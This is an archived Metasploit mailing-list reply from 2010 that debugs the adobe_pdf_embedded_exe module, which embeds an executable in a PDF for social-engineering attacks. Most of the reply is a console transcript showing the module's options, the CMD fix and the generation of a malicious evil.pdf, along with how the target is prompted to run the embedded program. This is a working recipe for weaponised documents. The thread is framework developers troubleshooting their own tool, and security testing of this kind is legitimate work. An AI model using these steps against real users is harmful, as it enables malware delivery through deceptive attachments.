Metasploit mailing list archives
Re: windows/fileformat/adobe_pdf_embedded_exe no more working
From: Jonathan Cran <jcran () 0x0e org>
Date: Wed, 3 Mar 2010 02:19:03 -0500
On Wed, Mar 3, 2010 at 1:46 AM, Thomas Werth <security () vahle de> wrote:
minor corrections:As it is "just javascript" (correct me if i'm wrong) that is executed, it should run browser independent ( i'm talking about executing custom exe, not a payload). Or did i get something wrong here ?I wanted to write "viewer" independend. Don't know how "browser" made it into this sentence :) Am 03.03.2010 07:36, schrieb Thomas Werth:Well i'm sorry this is not what i'm getting. In previous svn version it work like described even under foxitreader and pdf xchangeviewer and Acrobat Reader. Latest Version claims (depending on viewer) about cmd.exe not found or tries to execute *.pdf instead of *.exe As it is "just javascript" (correct me if i'm wrong) that is executed, it should run browser independent ( i'm talking about executing custom exe, not a payload). Or did i get something wrong here ?
Thomas, Without doing the background research *shame* I believe you're correct about the application using "just javascript" to execute the internal payload, or at least javascript-like functionality. However, each viewer has almost certainly implemented that javascript engine within their own product independently, and has just as likely modified that implementation or defaults) with all the controversy / problems around javascript+pdf. However, it appears Adobe has not :) It's working okay here with: * MS Windows XP Version 5.1.2600 Service Pack 3 Build 2600 * Adobe Reader 9.3.0 * Framework: 3.3.4-dev.8672 * Console : 3.3.4-dev.8617 * Windows/Exec Payload (shouldn't matter) * Exploit Transcript: msf exploit(adobe_pdf_embedded_exe) > info Name: Adobe PDF Embedded EXE Social Engineering Version: 8380 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: Colin Ames <amesc () attackresearch com> jduck <jduck () metasploit com> Available targets: Id Name -- ---- 0 Adobe Reader v8.x, v9.x (Windows XP SP3 English) Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME /tmp/calc.exe no The Name of payload exe. FILENAME evil.pdf no The output filename. INFILENAME /tmp/ms_eop.pdf yes The Input PDF filename. OUTPUTPATH /tmp/ no The location to output the file. Payload information: Space: 2048 Description: This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack. msf exploit(adobe_pdf_embedded_exe) > exploit [-] Exploit failed: The following options failed to validate: CMD. [*] Exploit completed, but no session was created. msf exploit(adobe_pdf_embedded_exe) > set CMD cmd.exe CMD => cmd.exe msf exploit(adobe_pdf_embedded_exe) > exploit [*] Reading in '/tmp/ms_eop.pdf'... [*] Parsing '/tmp/ms_eop.pdf'... [*] Parsing Successful. [*] Using '/tmp/calc.exe' as payload... [*] Creating 'evil.pdf' file... [*] Generated output file /tmp/evil.pdf [*] Exploit completed, but no session was created. msf exploit(adobe_pdf_embedded_exe) > msf exploit(adobe_pdf_embedded_exe) > version Framework: 3.3.4-dev.8672 Console : 3.3.4-dev.8617 PDF (evil.pdf) is then opened on target, and a prompt to save the file is presented. PDF (ms_eop.pdf) is saved on the desktop, and a prompt to run the internal executable is presented. Click 'okay' and calc.exe is presented. great success :) http://www.metasploit.com/redmine/issues/959 updated. Hope it helps jcran jcran () metasploit com
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Scanning machines Timm M.Schneider (Feb 19)
- Re: Scanning machines HD Moore (Feb 19)
- Re: Scanning machines Timm M.Schneider (Feb 19)
- windows/fileformat/adobe_pdf_embedded_exe no more working Thomas Werth (Feb 22)
- Re: windows/fileformat/adobe_pdf_embedded_exe no more working Joshua J. Drake (Feb 23)
- Re: windows/fileformat/adobe_pdf_embedded_exe no more working Tedi Heriyanto (Feb 23)
- Re: windows/fileformat/adobe_pdf_embedded_exe no more working One Time (Feb 23)
- Re: windows/fileformat/adobe_pdf_embedded_exe no more working Joshua J. Drake (Mar 02)
- Re: windows/fileformat/adobe_pdf_embedded_exe no more working Thomas Werth (Mar 02)
- Re: windows/fileformat/adobe_pdf_embedded_exe no more working Thomas Werth (Mar 02)
- Re: windows/fileformat/adobe_pdf_embedded_exe no more working Jonathan Cran (Mar 02)
- Re: windows/fileformat/adobe_pdf_embedded_exe no more working Joshua J. Drake (Feb 23)
- Re: Scanning machines HD Moore (Feb 19)
- <Possible follow-ups>
- Re: Scanning machines Timm M.Schneider (Feb 19)
- Re: Scanning machines HD Moore (Feb 19)
- Re: Scanning machines Timm M.Schneider (Feb 19)
- Re: Scanning machines HD Moore (Feb 19)
- Re: Scanning machines HD Moore (Feb 19)